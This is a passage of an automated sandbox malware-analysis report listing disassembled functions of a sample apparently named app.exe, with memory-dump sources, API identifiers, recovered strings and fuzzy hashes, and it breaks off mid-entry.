                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                                            • Opcode ID: 25d3c82af5dee18dec41a6839be42a4efbc899a14913ea0c1072e724c64aea02
                                                                                                                                                                                                            • Instruction ID: 1f30f3a123a72f4e4e8273897a9b2be7270bb1773d402cb61e426f06f3f887d1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25d3c82af5dee18dec41a6839be42a4efbc899a14913ea0c1072e724c64aea02
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C641A232B1DA81A5DB20AF25E4443AAE661FB88784F954031EA4D977A8DF3CD441C750
                                                                                                                                                                                                            Function 00007FF8A7E72B98 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285221052.00007FF8A7E71000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF8A7E70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285204631.00007FF8A7E70000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285237784.00007FF8A7E73000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285254997.00007FF8A7E74000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285271778.00007FF8A7E75000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7e70000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _wassert
                                                                                                                                                                                                            • String ID: (idx>=1) && (idx<=10)$src/AESNI.c
                                                                                                                                                                                                            • API String ID: 3234217646-2495715787
                                                                                                                                                                                                            • Opcode ID: 08d31a947a560325b6089d36716e23ca456f5369de0bb12b09cf002d6475e52f
                                                                                                                                                                                                            • Instruction ID: 8f2f8cb65bca961cd44cc481157ebf5bc77786602ed78e080da2f10af6dc26bb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08d31a947a560325b6089d36716e23ca456f5369de0bb12b09cf002d6475e52f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39210673D0E3C25AD7138F31A45016C3FB0EB96F80F898176C38843A82EA5CE8A5D701
                                                                                                                                                                                                            Function 00007FF7ACE9E438 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                            • Opcode ID: 4e53f776409002b20d4ddb835971d11a9637ed93fbd7b6ab35eb1d8227726c82
                                                                                                                                                                                                            • Instruction ID: 94ee1a951dfb319d97a8f1713dc2ececa86697bb39d86a66af79666253addb84
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e53f776409002b20d4ddb835971d11a9637ed93fbd7b6ab35eb1d8227726c82
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7021D272A0D28192EB34AB15D04427DF3B1FB84B84FC68035E79D672A4DF7CE9458761
                                                                                                                                                                                                            Function 00007FF7ACE82770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                            • String ID: Fatal error detected
                                                                                                                                                                                                            • API String ID: 1878133881-4025702859
                                                                                                                                                                                                            • Opcode ID: d8350b2dd45537fcb102945a95e56e5fec4cbfd54fbf68520de5e8d25681b826
                                                                                                                                                                                                            • Instruction ID: 9c3d92e197dfcc454b9a4380e5654ee6baf8d9b745810a057d7d445cf113829a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8350b2dd45537fcb102945a95e56e5fec4cbfd54fbf68520de5e8d25681b826
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7721C77272D781A1EB20A750F4507EAB364FB84789FC14035E68D676A5DF3CD205CB60
                                                                                                                                                                                                            Function 00007FF7ACE82880 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                            • String ID: Error detected
                                                                                                                                                                                                            • API String ID: 1878133881-3513342764
                                                                                                                                                                                                            • Opcode ID: 06108ee8a0dfea952a12a3b0306062f889501f0bb9d520917d4d6b2389df326d
                                                                                                                                                                                                            • Instruction ID: 12d15899d12f0a8a7e3900465ef0c1572254326ffc9584af98d6fe2b4252f6e4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06108ee8a0dfea952a12a3b0306062f889501f0bb9d520917d4d6b2389df326d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C221B27272D782A1EB20A750F4503EAB364FB84789FC15035EA8D676A9DF3CD205CB60
                                                                                                                                                                                                            Function 00007FF7ACE8EEE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                                            • Opcode ID: 858846fea34555fb8d2c4f12b26bdb04a58b0d9f624c4d397e9619eb30fde2ff
                                                                                                                                                                                                            • Instruction ID: 8d85c9f7d9476b0639170df2c23d7d35ce3eb7369c336d506b5bdbc8223d4428
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 858846fea34555fb8d2c4f12b26bdb04a58b0d9f624c4d397e9619eb30fde2ff
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97118C3660DB8192EB219F15E500269B7A0FB88B85F9D4270EE8C17768DF3CC5618B10
                                                                                                                                                                                                            Function 00007FF7ACE9EF3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                            • API String ID: 2595371189-336475711
                                                                                                                                                                                                            • Opcode ID: 4110ab54a1292af6c610fc14bebcfde478b3b42ba13f09fd81a5f0b3dffa68e3
                                                                                                                                                                                                            • Instruction ID: 4d71671faf30ffc65a265887edb7199b2c699ed85b22a12e0cc2efba0b7b364c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4110ab54a1292af6c610fc14bebcfde478b3b42ba13f09fd81a5f0b3dffa68e3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1601843191E642A6F730BF60946227EE390EF44744FC60536E65E676A5DF3CE504CA24
                                                                                                                                                                                                            Function 00007FF8A7FFC390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AttrObject_String
                                                                                                                                                                                                            • String ID: close$close
                                                                                                                                                                                                            • API String ID: 4108415579-1493118870
                                                                                                                                                                                                            • Opcode ID: 212c211b7a44556a8a3806320755016be30287762e5d8e91c8d41298e6e1194c
                                                                                                                                                                                                            • Instruction ID: 1006ed85b4cbcc9b26ecaabcff3fddf85b8d49aa3a99ba44eb1ce631895ea16b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 212c211b7a44556a8a3806320755016be30287762e5d8e91c8d41298e6e1194c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30F06252E0BA46A0FF548F29D49473823A0EB54BC8F480031C94D462A0CFBDD5EAE354
                                                                                                                                                                                                            Function 00007FF8A7FF7440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AttrObject_String
                                                                                                                                                                                                            • String ID: close$close
                                                                                                                                                                                                            • API String ID: 4108415579-1493118870
                                                                                                                                                                                                            • Opcode ID: f2ce629a04051adfc5ad995760a64f8586141f19bd550481dedfe1c89789ca21
                                                                                                                                                                                                            • Instruction ID: 340bd8b4481dc5a43b4dd9f59687d7fbf8de2e630e0a27939863d8c9197df30d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2ce629a04051adfc5ad995760a64f8586141f19bd550481dedfe1c89789ca21
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2CF06212A0BA46E1FF548F29D49473827B1EB14BC8F995031C90D4A2A0DF7DD5EAE325
                                                                                                                                                                                                            Function 00007FF8A7FFF640 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Buffer_Err_FillInfoString
                                                                                                                                                                                                            • String ID: buffer is too large for this platform
                                                                                                                                                                                                            • API String ID: 1071087250-3685215998
                                                                                                                                                                                                            • Opcode ID: 91064455fb1ca5502ff9100f544ecc38e56fca14dea45ab14ce7974c9db78d09
                                                                                                                                                                                                            • Instruction ID: fdb710b23e56d94480961b5cba3eeb4f7c4ba2f9dbc402207f87254077705939
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91064455fb1ca5502ff9100f544ecc38e56fca14dea45ab14ce7974c9db78d09
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0F058B1A05A4182DE109B65D80032827A0FB99BF8FA08331DA3C477F0DF7CC166C744
                                                                                                                                                                                                            Function 00007FF8A7FF5D30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Arg_Bytes_FromKeywords_ParseSizeStringTuple
                                                                                                                                                                                                            • String ID: |O:flush
                                                                                                                                                                                                            • API String ID: 63232897-4223457631
                                                                                                                                                                                                            • Opcode ID: 25bdaef9823ce220ef0125a3acd7d090d34cb8c4b7f3a4ed51738998a4cbd1e3
                                                                                                                                                                                                            • Instruction ID: 93acd1bc4f62678afb49a1bf76c3a0e627e3ac0b8fc1dad28d588d1e4ea2ca77
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25bdaef9823ce220ef0125a3acd7d090d34cb8c4b7f3a4ed51738998a4cbd1e3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BFE01265B0AA82A1DE009FA1F8547A677A0FB95BD0FC00036C95D427B0DF7CD1A9C714
                                                                                                                                                                                                            Function 00007FF8A7FF7610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_String
                                                                                                                                                                                                            • String ID: cannot __enter__ multiple times$stream is closed
                                                                                                                                                                                                            • API String ID: 1450464846-1434507833
                                                                                                                                                                                                            • Opcode ID: 14cf9db0ba0a23092a42d4b63bfe469573d993fdc2517741ccd9055b36242fd0
                                                                                                                                                                                                            • Instruction ID: a61a87099dbcea385dea75f25509cd89f173ebceb15eaa56c498f28d881355be
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14cf9db0ba0a23092a42d4b63bfe469573d993fdc2517741ccd9055b36242fd0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53F06562E0B642E0EF449F29D88837823A0F748B88FD55031C60D452E0DFBD91DBD310
                                                                                                                                                                                                            Function 00007FF8A7FFC630 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_String
                                                                                                                                                                                                            • String ID: cannot __enter__ multiple times$stream is closed
                                                                                                                                                                                                            • API String ID: 1450464846-1434507833
                                                                                                                                                                                                            • Opcode ID: c6189aa05dd5a90ecb54966df30277a1e375b8d7da3c0bcbf1ef8e368f0ab2bc
                                                                                                                                                                                                            • Instruction ID: cba6208bf44782807795951a564d6d540da3d6b24290260fd5060a093f5428da
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6189aa05dd5a90ecb54966df30277a1e375b8d7da3c0bcbf1ef8e368f0ab2bc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FE0E566E0B642E1EB448F2DD84537837E0F758B88FA15535C50D462A0DFBD959BDB00
                                                                                                                                                                                                            Function 00007FF8A8131BB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                            • String ID: Unknown exception
                                                                                                                                                                                                            • API String ID: 932687459-410509341
                                                                                                                                                                                                            • Opcode ID: 169c20dc001816a24a31786a37add3a6caf8fda9c91b1e46f835c59b736433a3
                                                                                                                                                                                                            • Instruction ID: b2219da12ffd70ed1b29c7d19f5d1882742eb9c8acb2db6652baa735fcaa6ae7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 169c20dc001816a24a31786a37add3a6caf8fda9c91b1e46f835c59b736433a3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABD05E22B2A986B1DE11EB04D8957A97334FB90389FD04432E24D415B1DF6DDA4AD724
                                                                                                                                                                                                            Function 00007FF8A8065BB0 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memmove
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2162964266-0
                                                                                                                                                                                                            • Opcode ID: 3d2cda625ecda15897edb9eef5b6e62eac8eb8e1ea5ba14afa43ae81a5d77a6f
